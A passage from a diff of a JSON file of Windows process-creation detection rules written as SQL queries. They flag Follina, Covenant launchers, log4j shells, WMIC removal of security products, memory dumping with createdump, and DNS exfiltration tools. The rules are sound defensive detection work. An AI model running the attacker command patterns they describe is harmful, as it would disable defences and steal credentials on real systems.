logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", + "attack.t1218", "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", - "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "status": "test", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.002" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001", + "attack.t1564.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE 
'%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.005" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious 
shell spawned from Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE 
'\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "status": "test", - "description": 
"Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1059" + 
"attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate use by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "status": "test", + 
"description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon 
Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new 
service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.impact", + "attack.t1485" + ], + "falsepositives": [ + "System administrator usage" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + }, + { + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "status": "experimental", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT 
(NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_renamed_createdump.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE 
'\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "status": "experimental", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName 